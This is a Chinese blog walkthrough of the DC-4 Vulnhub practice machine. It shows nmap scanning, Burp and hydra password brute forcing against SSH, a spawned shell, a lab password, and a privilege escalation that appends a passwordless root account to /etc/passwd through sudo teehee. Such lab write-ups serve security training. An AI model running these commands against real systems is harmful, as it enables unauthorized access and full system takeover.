DC-4靶机

最新推荐文章于 2024-04-30 15:41:29 发布
最新推荐文章于 2024-04-30 15:41:29 发布
阅读量206 收藏
点赞数
分类专栏: DC靶机 文章标签: 服务器 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/125535798
版权

ifconfig

查找主机IP

扫一波内网,探测下存活主机

nmap 192.168.61.0/24

打开显示的IP地址

burp爆破

用kali的/usr/share/john下的password.lst当字典,burp爆破

 

 暗示我们可以吧命令改成我们想运行的命令,比如反弹shell

kali开启监听,获取到信息

反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

尝试进入到home目录,看到三个三件夹,应该是三个用户

pwd

cd /home

ls

 查看jim,buckups里有old-passwords.bak文件,应该是密码文件

把密码保存为文件1

爆破密码

hydra -l jim -P 1 -t 10 ssh://192.168.61.132
或
hydra -l jim -P 1 192.168.61.132 ssh

然后连接密码 

ssh jim@192.168.61.132

表示有邮件

 

Charles(之前三个人名中出现过) 

然后还给了密码:^xHhA&hvim0y

登录了Charles

提权

sudo -l

sudo teehee -a /etc/passwd
root666::0:0::/bin/bash

然后ctrl+c保存

cat /etc/passwd

 写入成功

切换root666用户

su root666

 然后cat flag.txt就行了

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
DC-4靶机渗透
weixin_45349299的博客
12-21 903
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC-4靶机渗透测试
今天不学习 明天变垃圾
04-18 689
DC-4
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 572
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机的攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3460
DC-4靶机渗透测试详细教程
dc-4 靶机渗透学习
..
03-19 2938
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2220
vulnhub DC-4靶机实战
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 482
dc4靶机渗透教程
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2357
Vulnhub-DC-4靶机实战
靶机练习-DC-4靶机复现
m0_63755076的博客
09-21 1032
hydra -l jim -P /root/桌面/pass ssh://192.168.用的darkweb2017-top10000.txt,爆破出来密码是happy。发现有charles,jim和sam可以登录,查看三个账户的家目录。发现46996.sh脚本可以提权,将其发送到DC-4中。发现开放了22和80端口,访问80端口。2.使用nmap扫描靶机开放的端口(发现有exim4命令,可以提权。执行46996.sh文件。
DC-4靶机提权超详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
WinForms 应用程序中使用 SignalR 连接到服务器
一个专注于技术研究创新的程序员
04-29 546
假设您已经在服务器端实现了名为 SignalRHub 的 SignalR Hub,并且该 Hub 包含了一个名为 SendMessage 的方法,用于接收来自客户端的消息,并将其广播给所有连接的客户端。客户端在收到消息时调用名为 ReceiveMessage 的方法来处理。
服务器遭受攻击后的黑洞状态应对策略及防护机制解析
NSME1的博客
04-30 909
服务器被打到黑洞的处理方法
服务器分类
最新发布
CookieSAdam的博客
04-30 391
这些分类方式并不是互斥的,一个服务器可能会同时符合多个分类标准。例如,一个企业级服务器可能是用于存储数据库和运行应用程序的。服务器可以按照其功能、用途、规模和部署方式进行分类。
深入浅出DBus-C++:Linux下的高效IPC通信
小灰灰的博客
04-30 1159
DBus 是一种消息总线系统,允许应用程序之间进行异步通信。使用 DBus,应用程序可以广播消息、请求和响应服务。系统总线(system bus):用于系统级服务,如硬件状态、系统守护进程等。会话总线(session bus):用于用户会话级别的通信,如桌面环境中的应用程序。DBus-C++允许你通过定义接口和方法的方式来处理DBus调用。public:// 方法实现。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值